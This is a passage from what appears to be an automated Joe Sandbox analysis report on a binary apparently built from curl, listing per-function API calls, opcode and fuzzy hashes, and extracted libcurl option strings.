                            • Instruction Fuzzy Hash: 32E09235A0560A86FB586BA480545B52330AF11B35F885730C93D063D0CF9CA48ADBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLastrecv
                            • String ID:
                            • API String ID: 2514157807-0
                            • Opcode ID: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
                            • Instruction ID: a30d3ed9f7784d6deff590aacfaa6aee10b0e3a93d43683252ba03d3917d4374
                            • Opcode Fuzzy Hash: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
                            • Instruction Fuzzy Hash: 75E0DF32B1460683EF2DEB74E46477862B09B44B36F948738D63B891E4EFEC948093D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CreateEvent
                            • String ID:
                            • API String ID: 2692171526-0
                            • Opcode ID: a1202a4f35f3f3c974eb3240b5606adf9e5f52a8b1520369c6ffe85bf282d75f
                            • Instruction ID: 4ffaaa4e880e4d71ff7b557d17591760f6829716ab59c069293347db9f784165
                            • Opcode Fuzzy Hash: a1202a4f35f3f3c974eb3240b5606adf9e5f52a8b1520369c6ffe85bf282d75f
                            • Instruction Fuzzy Hash: 50B17076609B4682EB18EF15E580169B3F5FB08B80F948A35CB6D07795DF7CE4A1C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CloseEvent
                            • String ID:
                            • API String ID: 2624557715-0
                            • Opcode ID: a5df2b72610b570ce1908f027d5652573bef9cab6cbb67673dfd0f362df5ac8f
                            • Instruction ID: b52b5bac5345511d48672d0a6199f6ff21eba40c5c4e372a068a75a8044ea7ae
                            • Opcode Fuzzy Hash: a5df2b72610b570ce1908f027d5652573bef9cab6cbb67673dfd0f362df5ac8f
                            • Instruction Fuzzy Hash: D241B032A09A8191EB58FF2194406BCA3B4FB84B94F884031DE1E177D6CFBCE552C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: socket$CriticalInitializeSectionacceptbindconnectgetsocknamehtonlioctlsocketlistensetsockopt
                            • String ID:
                            • API String ID: 3227912855-0
                            • Opcode ID: 9875a259e44e698a382a0477886efb4c24fe8866157c85e1b840ee6d89d01730
                            • Instruction ID: 3e1f11ff2564c0be576d0ec1425bad518dd3d14381ed46c264b5dbc15b306d45
                            • Opcode Fuzzy Hash: 9875a259e44e698a382a0477886efb4c24fe8866157c85e1b840ee6d89d01730
                            • Instruction Fuzzy Hash: D221A222A08B4182E724DF1AE404568B3B4FB9CB40F499231DF9D03751EF78F195C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: closesocket
                            • String ID:
                            • API String ID: 2781271927-0
                            • Opcode ID: 5d1c12ce3e406ddb47fbfb544e9488b7ac7037f43742f4faecb30d92619eb0f2
                            • Instruction ID: 552af0c62cc428de32a3f7d37ef7aebac41070e3592cc65041d9fa8eff62ae95
                            • Opcode Fuzzy Hash: 5d1c12ce3e406ddb47fbfb544e9488b7ac7037f43742f4faecb30d92619eb0f2
                            • Instruction Fuzzy Hash: 10219261B096C151FF59EB5A90443B9A6B0EF64F84F4C8135CA2E0B7C5DFBCE48593A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FF7F1DA0760,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0C05
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: fgets
                            • String ID:
                            • API String ID: 3135385589-0
                            • Opcode ID: ac3c78e7f8116b5db82dbeb73fa94708eaada963b6dec0bdd3113bf56410781b
                            • Instruction ID: 7816f7c4beb1fb7fb415b89fb727881f036786e32cd98e48aa2561d3fa495a90
                            • Opcode Fuzzy Hash: ac3c78e7f8116b5db82dbeb73fa94708eaada963b6dec0bdd3113bf56410781b
                            • Instruction Fuzzy Hash: F6119122A0C78246FB24E714D4513E993A0EF597E4F844230D9BD437CADFADE5858761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _open
                            • String ID:
                            • API String ID: 4183159743-0
                            • Opcode ID: 8b3b092e98626b40b13565fe8faab6bf7b26d7162c65fde3ab2d11e9048430ea
                            • Instruction ID: cde17b075e0ad114c1a7a1ebf4398b10e9e1c184c1ba978bde087f20b791f991
                            • Opcode Fuzzy Hash: 8b3b092e98626b40b13565fe8faab6bf7b26d7162c65fde3ab2d11e9048430ea
                            • Instruction Fuzzy Hash: 9FD05E32B10721C2E708AF1AC441418BA70FBE5F41BD14474C65C03724CF78D5A5CF84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1D9A3F0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A455
                              • Part of subcall function 00007FF7F1D9A3F0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A475
                              • Part of subcall function 00007FF7F1D9A3F0: WSACleanup.WS2_32 ref: 00007FF7F1D9A48E
                              • Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A49E
                              • Part of subcall function 00007FF7F1D9A3F0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4B7
                              • Part of subcall function 00007FF7F1D9A3F0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4D0
                              • Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A4DE
                              • Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A503
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A608
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$FreeLibraryfclose$Cleanupfflush
                            • String ID:
                            • API String ID: 926655102-0
                            • Opcode ID: 118942a41a588764a62101d4cdb4da7eec38e2eb7b33ac475087595b4e9a6439
                            • Instruction ID: dfcd10daa26c58d844a82095cd1b99705e77652c351a411a71ea1abb97693bdf
                            • Opcode Fuzzy Hash: 118942a41a588764a62101d4cdb4da7eec38e2eb7b33ac475087595b4e9a6439
                            • Instruction Fuzzy Hash: 37D05E3BB04B4096DB64AB25E00559C6360F78C780F990572DE7D8334ADE79C841CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ConsoleMode
                            • String ID:
                            • API String ID: 4145635619-0
                            • Opcode ID: 92635901b1ea465b8fe46a3e3dd3025ac8b39161e71a82ed16274b68352894fe
                            • Instruction ID: 6aeee1ad4e5a1a31b1b870f7863a81c9c65435444e82f8c3cb0defe032bfebbb
                            • Opcode Fuzzy Hash: 92635901b1ea465b8fe46a3e3dd3025ac8b39161e71a82ed16274b68352894fe
                            • Instruction Fuzzy Hash: 5CD0C920E1E55397FB4DBB7AAC91071A3706F48306FD55430C92E822A0DFACE4618BE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 48a1125f6749bdc14625ada9a6c1b331a8951bbbc20a73abeb2e479d87fe1efa
                            • Instruction ID: 792e7844bdef6fd4e6b96941c152364eabf7ae87a2810028f7c44d8b81e3ad5e
                            • Opcode Fuzzy Hash: 48a1125f6749bdc14625ada9a6c1b331a8951bbbc20a73abeb2e479d87fe1efa
                            • Instruction Fuzzy Hash: 93D0C955E1FA0292FB0CBB81A885370A7606F54707FD90634C02E141E0CFEC60A5C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DA1E80: __swprintf_l.LIBCMT ref: 00007FF7F1DA1F37
                              • Part of subcall function 00007FF7F1DA1E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F1D9F1CE,?,?,?,?,?,00000000,00000000,00007FF7F1D9F585,?,00000001,?,00000000,00000000), ref: 00007FF7F1DA20BD
                              • Part of subcall function 00007FF7F1DA1E80: __swprintf_l.LIBCMT ref: 00007FF7F1DA1FDD
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9EC4A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_lfree
                            • String ID: <($CURLOPT_ABSTRACT_UNIX_SOCKET$CURLOPT_ALTSVC$CURLOPT_CONNECT_TO$CURLOPT_DEBUGDATA$CURLOPT_DEBUGFUNCTION$CURLOPT_DEFAULT_PROTOCOL$CURLOPT_DISALLOW_USERNAME_IN_URL$CURLOPT_EXPECT_100_TIMEOUT_MS$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_CREATE_MISSING_DIRS$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_FTP_USE_EPRT$CURLOPT_FTP_USE_EPSV$CURLOPT_FTP_USE_PRET$CURLOPT_GSSAPI_DELEGATION$CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS$CURLOPT_HAPROXYPROTOCOL$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HSTS$CURLOPT_HTTP_CONTENT_DECODING$CURLOPT_HTTP_TRANSFER_DECODING$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_IPRESOLVE$CURLOPT_LOCALPORT$CURLOPT_LOCALPORTRANGE$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_MAIL_RCPT_ALLLOWFAILS$CURLOPT_MAXFILESIZE_LARGE$CURLOPT_NEW_FILE_PERMS$CURLOPT_PROTOCOLS$CURLOPT_PROXY_SERVICE_NAME$CURLOPT_PROXY_TLS13_CIPHERS$CURLOPT_PROXY_TLSAUTH_PASSWORD$CURLOPT_PROXY_TLSAUTH_TYPE$CURLOPT_PROXY_TLSAUTH_USERNAME$CURLOPT_REDIR_PROTOCOLS$CURLOPT_RESOLVE$CURLOPT_SASL_AUTHZID$CURLOPT_SASL_IR$CURLOPT_SERVICE_NAME$CURLOPT_SOCKS5_AUTH$CURLOPT_SOCKS5_GSSAPI_NEC$CURLOPT_SSLENGINE$CURLOPT_SSL_ENABLE_ALPN$CURLOPT_SSL_ENABLE_NPN$CURLOPT_SSL_SESSIONID_CACHE$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_KEEPIDLE$CURLOPT_TCP_KEEPINTVL$CURLOPT_TFTP_BLKSIZE$CURLOPT_TFTP_NO_OPTIONS$CURLOPT_TLS13_CIPHERS$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_UNIX_SOCKET_PATH$CURLOPT_USE_SSL$CURLOPT_VERBOSE
                            • API String ID: 399239331-57453129
                            • Opcode ID: 467492ba8c959cabc1a8f4f2d6133e089b2ea84b010a5b04c9ad920188eb27f7
                            • Instruction ID: 3486af91892d70f5cbbf98d646078a7eacacb5ed5b700ebd402fe463de581141
                            • Opcode Fuzzy Hash: 467492ba8c959cabc1a8f4f2d6133e089b2ea84b010a5b04c9ad920188eb27f7
                            • Instruction Fuzzy Hash: F882A37160978286E764EB11E4805AAF7F8FB887C4F844235EAAC537A5DF7CE224C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _fileno$__acrt_iob_func_errno_isatty_setmodefreeioctlsocketstrerror
                            • String ID: %s%c%s$%s/%s$+$,N$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Can't open '%s'!$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$bad output glob!$fcntl failed on fd=%d: %s$http://$https://$output glob produces empty string!$proxy support is disabled in this libcurl$"]$'$3\$<[$I;$g\$j[$nZ$\
                            • API String ID: 3924750426-4013526855
                            • Opcode ID: dff0a90e56affe60765fbc2c71b9d7dc1728afcdce615f3453fdb8d0977f7058
                            • Instruction ID: cf1cbd94314c12a987cbd3d005cd0b1ad5eccbdf23038a162f55c00ee6713e5f
                            • Opcode Fuzzy Hash: dff0a90e56affe60765fbc2c71b9d7dc1728afcdce615f3453fdb8d0977f7058
                            • Instruction Fuzzy Hash: 3532F022A0E78682FB64EB21A4446B9A7B4FF89784FC54135DA6D077D5DFBCE500C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$free
                            • String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
                            • API String ID: 1144208884-223163314
                            • Opcode ID: 872343d23281035c79468e3a4c0806f807a27192c4dd38ef4a8c741f7050dd3b
                            • Instruction ID: 21ce2aab6a6a8d356c5feb3693e62d142846337560c4818270a2ccd1c7f4d274
                            • Opcode Fuzzy Hash: 872343d23281035c79468e3a4c0806f807a27192c4dd38ef4a8c741f7050dd3b
                            • Instruction Fuzzy Hash: 2602E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$free
                            • String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
                            • API String ID: 1144208884-223163314
                            • Opcode ID: a1d5a9935ef0b0a00b65c9a83cfba9fffc0bc6a792ee380ff02ab6ef0c9c3870
                            • Instruction ID: a7a9f7dbac33862076f3022ceb7fb47cb01a7772c043e8b328c8aa733ce9f702
                            • Opcode Fuzzy Hash: a1d5a9935ef0b0a00b65c9a83cfba9fffc0bc6a792ee380ff02ab6ef0c9c3870
                            • Instruction Fuzzy Hash: 6302E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$free
                            • String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
                            • API String ID: 1144208884-223163314
                            • Opcode ID: 70b3ba7b47507934b5f763d8a7dc68f7ba67d47251894a02df1358efe3a694ef
                            • Instruction ID: fe051c7ded2b8d06e92a719895de94d64459158e3a6b4a4e8eff318f4840eb2b
